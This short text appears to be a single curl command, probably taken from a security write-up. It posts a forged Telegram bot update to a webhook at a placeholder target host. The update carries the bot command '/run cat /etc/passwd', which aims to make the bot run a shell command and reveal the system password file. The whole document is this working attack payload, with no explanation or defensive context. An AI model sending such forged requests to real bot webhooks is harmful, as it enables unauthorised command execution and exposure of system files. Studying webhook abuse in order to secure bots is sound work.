curl --request POST --url 'https: //target.com/
bot_hook/' --header 'content-type: application/json'
--data '{"update_id": 0, "message": {"message_id": 0,
"from": {"id": 11111111, "is_bot": false,
"first_name": "Some", "last_name": "User",
"username": "some_user", "language_code": "en"},
"chat": {"id": 777777777, "first_name": "Some",
"last_name": "User", "username": "some_user", "type":
"private"}, "date": 0, "text": "/run cat /etc/
passwd", "entities": [{"offset": 0, "length": 4,
"type": "bot_command"}]}}'